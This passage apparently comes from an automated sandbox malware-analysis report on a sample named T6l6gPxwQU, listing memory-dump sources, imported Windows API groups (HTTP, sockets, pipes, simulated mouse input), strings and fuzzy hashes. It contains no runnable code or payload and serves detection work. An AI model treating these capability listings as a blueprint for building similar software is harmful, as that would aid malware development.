                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                        • Instruction ID: 1a9cf3d9f1cd412fe524256c69d146e327389486f8fc93c8c36b6b1191805cfb
                                                                        • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                        • Instruction Fuzzy Hash: CF51C062A0C2D156FB718B796110A7E6FA1FB4ABC8F489074DBC987E57CE08E4568321
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                        • String ID:
                                                                        • API String ID: 3401586794-0
                                                                        • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                        • Instruction ID: 63667f5c9ac8336382da3fb2baca8d234cc5c6d0a79a4e6eb931585b23d7b7c4
                                                                        • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                        • Instruction Fuzzy Hash: A751A326608B4286E714DF29E940AAE67A0FB4CB8CF544035DF1D97B64DF39E459CB40
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: LongMessageSendWindow
                                                                        • String ID:
                                                                        • API String ID: 3360111000-0
                                                                        • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                        • Instruction ID: 15e0e502e7509a75af3e526c0fac1044d126e3c9b6a501aaabd2a5b01c3a66a2
                                                                        • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                        • Instruction Fuzzy Hash: F7415926A18A5685EA608F2EE5916793360FBC9F98F245132CB1EC7BB5CF3DE441C300
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 4170576061-0
                                                                        • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                        • Instruction ID: 2821786360b4adaed7eff17c330810352125a1084bde56086d159b36caaf77d0
                                                                        • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                        • Instruction Fuzzy Hash: 59418172A0868282E7209F2AE4442AD7360FB89BA8F544735DF5E877A5CF3CE545C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 395352322-0
                                                                        • Opcode ID: d1d8bf5937bffa04a585e1c3e8d3a5dfb2b3d01d6cd9d7eb2bde5fff57a10d68
                                                                        • Instruction ID: 9144eac343f189040cad48e5fd5988b37bf4c8c05498c3df1702c0d7f2033f2e
                                                                        • Opcode Fuzzy Hash: d1d8bf5937bffa04a585e1c3e8d3a5dfb2b3d01d6cd9d7eb2bde5fff57a10d68
                                                                        • Instruction Fuzzy Hash: 4F419232A58B8596E720CF15E4547EE63A0FB8D788F940131EB8D8BA68CF7DD159CB00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 25a170339ac7b752a749b8cbe6371017fe33a5f1f52912a62420eb4b7249f3da
                                                                        • Instruction ID: af03175373e27fbc956eda778bc84ceed71391c80d2651c89396f36279aa91ff
                                                                        • Opcode Fuzzy Hash: 25a170339ac7b752a749b8cbe6371017fe33a5f1f52912a62420eb4b7249f3da
                                                                        • Instruction Fuzzy Hash: 04316F31B08B8685EB649F1AF44417973A0FB89FD8F488236DB9E937A5CE3CE4458744
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AllocByteCharMultiStringWide
                                                                        • String ID:
                                                                        • API String ID: 3603722519-0
                                                                        • Opcode ID: fcd075470693daa97f2a1c040a0b0bfa866470de5cb70d214c6f86d5a398f3db
                                                                        • Instruction ID: 46b5334973e2068ba9b1fa24bd58889fe9501faadc7f7169efc8810383c80489
                                                                        • Opcode Fuzzy Hash: fcd075470693daa97f2a1c040a0b0bfa866470de5cb70d214c6f86d5a398f3db
                                                                        • Instruction Fuzzy Hash: 69315031B48B8689EB209F1AF444179B3A0FB48F98F584236DB9D937A5DF3CE5858700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 1025951953-3636473452
                                                                        • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                        • Instruction ID: 5c4f82b3665d8244f4889bc9f9ab65c7e570be8061a91bdd548febd498b810e4
                                                                        • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                        • Instruction Fuzzy Hash: 4B313A3661969187E3608F69F494B1AB761FB88794F109239EB9983B69CF3CD845CF00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandlePipe
                                                                        • String ID: nul
                                                                        • API String ID: 1424370930-2873401336
                                                                        • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                        • Instruction ID: b1606e996425cc5a85c3b7e30b19cd69d9718cb544ec16555c381b0d08e99d01
                                                                        • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                        • Instruction Fuzzy Hash: 69318472A18A8691EB508F68D41437923A0FB59B7CF544330DBBD867E5DF3CE4468701
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandlePipe
                                                                        • String ID: nul
                                                                        • API String ID: 1424370930-2873401336
                                                                        • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                        • Instruction ID: bfc8519486c49e756162034d14b63dd9499aa86e3afd33e966909207c6254ab6
                                                                        • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                        • Instruction Fuzzy Hash: 82219531A18B8692EB148B68E01437963A0FB8977CF504331DBBE867E6DF7CE0058700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                        • String ID:
                                                                        • API String ID: 3220332590-0
                                                                        • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                        • Instruction ID: 4e42cb19bd35f5dab8d04eef227d6a31162a1c434fad47d70e167429f56b76e5
                                                                        • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                        • Instruction Fuzzy Hash: 06A1BF6BA1829386E7248F7984047BD33A0FF48B5CF145135EF1AD7AA4EE399845E320
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: f$p
                                                                        • API String ID: 3215553584-1290815066
                                                                        • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                        • Instruction ID: 7b2e8bab6ffc34535963058e946f75da4b61c97802ea7cab7f4070bfdbf94707
                                                                        • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                        • Instruction Fuzzy Hash: A512A422E2E25385FB209B1EE04467A6661FB4876CF994231E79D866E4DF3DE540DF00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                        • String ID:
                                                                        • API String ID: 3859894641-0
                                                                        • Opcode ID: 8e44bf46c7e5b12b80dc938b927224b029bd7917f521fbe4f51ebd57dbe57272
                                                                        • Instruction ID: 825cd95a7d5b2b0b10f351d8264c0f625b30c0925058b836d4e602b27fcfce8a
                                                                        • Opcode Fuzzy Hash: 8e44bf46c7e5b12b80dc938b927224b029bd7917f521fbe4f51ebd57dbe57272
                                                                        • Instruction Fuzzy Hash: 71715E71A2A64282EB289F2DD95417C6360FF4DB88F148636D74E8B7B5DF2DE921C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 564229958-0
                                                                        • Opcode ID: d9598a99559bbce9838ccc8e3f13cd44917abc84097f4dea62aff47b12167531
                                                                        • Instruction ID: 1429202e172ec8c247f13a832259a163ab94da836d31acb860b9741998096812
                                                                        • Opcode Fuzzy Hash: d9598a99559bbce9838ccc8e3f13cd44917abc84097f4dea62aff47b12167531
                                                                        • Instruction Fuzzy Hash: 43513822A146C295EB20DF68D4402ED6365FF9978CF844032E78D976AADFA8D745C740
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 0-2263619337
                                                                        • Opcode ID: aa6789edd5eec0de91f5163da99e610be347a5c35b1970d0f65f42280687e41a
                                                                        • Instruction ID: b01b99d3f4297291a61d0f44ec2ad53e6de00841603b488a2a66578760d2b6d9
                                                                        • Opcode Fuzzy Hash: aa6789edd5eec0de91f5163da99e610be347a5c35b1970d0f65f42280687e41a
                                                                        • Instruction Fuzzy Hash: 7C515B72B09A4285EE20DF6DE4541BC23A5BB4AB9CF648131DB0E977B9DE79E409C340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                        • String ID:
                                                                        • API String ID: 2592858361-0
                                                                        • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                        • Instruction ID: 1a97247054c422a95f4041dd98efc66e8c963a6d3cd61b5eaa9f95a119be09b5
                                                                        • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                        • Instruction Fuzzy Hash: D551AE32A18B9286E720CB1AE44477A3764FB4EB98F144235DB6D87BA4CF7DE505C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                        • String ID:
                                                                        • API String ID: 383626216-0
                                                                        • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                        • Instruction ID: efc79ac588a330063bdd8cd281246555f610e25087d472050e20579f857b76f3
                                                                        • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                        • Instruction Fuzzy Hash: D6319133B046528BE314CF65D4807AC33A5FB9874CF504235EB5A93A95DF38E549C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 2082702847-0
                                                                        • Opcode ID: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                        • Instruction ID: 1612ed659adb40674fb6d5d1b5363a93eef4ae4aad052ada59ff17ce8f7757a1
                                                                        • Opcode Fuzzy Hash: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                        • Instruction Fuzzy Hash: 94218E21A0974281EE169F69E8242BD6290BF4CBBCF140735DB3D867F5DF3CE8688604
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                        • String ID:
                                                                        • API String ID: 43455801-0
                                                                        • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                        • Instruction ID: eebfeca717c678d9452fdf19aa88ff09369585f4ad70058c77b0c2c27734b369
                                                                        • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                        • Instruction Fuzzy Hash: 6911BF31B5429386E7148B1AF828769BB60FB89B88F484131CF0643B60CF7EA445C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
